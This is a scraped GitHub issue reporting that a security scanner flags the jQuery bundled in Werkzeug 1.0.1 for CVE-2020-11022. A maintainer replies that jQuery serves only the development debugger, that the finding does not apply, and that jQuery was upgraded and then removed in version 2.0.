You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
Environment:
Python version: 3.7
Werkzeug version:
1.0.1
The text was updated successfully, but these errors were encountered:
Please see previous discussions about jQuery before reporting new issues. jQuery is only used by the debugger in the development server, which is already a huge hole if you're running it anywhere where the ability to craft an XSS for it would matter. These CVEs are not relevant for the way jQuery is used by Werkzeug. Your security tools should be able to account for that so that you can ignore irrelevant results.
That said, we have already removed jQuery completely for 2.0: #1807. And before we did that, we had already upgraded it to 3.5.1: #1806.
According to our security scanning tool, the packaged version of jquery inside Werkzeug has a security exposure
When I run a security exposure scan on the werkzeug library I get this jquery issue:
https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-11022
s/werkzeug/debug/shared/jquery.js
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
Environment:
1.0.1
The text was updated successfully, but these errors were encountered: